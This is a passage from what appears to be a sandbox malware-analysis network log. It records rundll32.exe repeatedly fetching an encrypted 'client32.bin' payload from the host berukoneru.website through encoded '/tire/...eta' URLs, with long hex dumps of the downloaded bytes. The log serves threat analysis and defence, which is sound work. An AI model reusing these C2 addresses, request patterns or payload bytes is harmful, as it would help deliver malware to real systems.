d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                            Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                            2021-12-14 09:21:39 UTC273INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                            Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                            2021-12-14 09:21:39 UTC290INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                            Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                            2021-12-14 09:21:39 UTC306INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                            Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                            2021-12-14 09:21:39 UTC322INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                            Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                            2021-12-14 09:21:39 UTC338INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                            Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                            2021-12-14 09:21:39 UTC354INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                            Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                            2021-12-14 09:21:39 UTC370INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                            Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                            2021-12-14 09:21:39 UTC386INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:39 UTC402INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:39 UTC418INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.64982379.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:40 UTC1895OUTGET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC1896INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=v9r8vnipl3dhaoaej59v015p80; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:40 UTC1896INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                            Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.64982579.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:40 UTC1898OUTGET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC1898INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=556vhnkqkn9iuh6ietolk9e630; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:40 UTC1899INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                            Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.64981479.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC289OUTGET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC419INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 213639
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=50rkccuo2l6o33r9sc7cq0jui3; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC419INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                            Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                            2021-12-14 09:21:39 UTC435INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                            Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                            2021-12-14 09:21:39 UTC451INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                            Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                            2021-12-14 09:21:39 UTC467INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                            Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
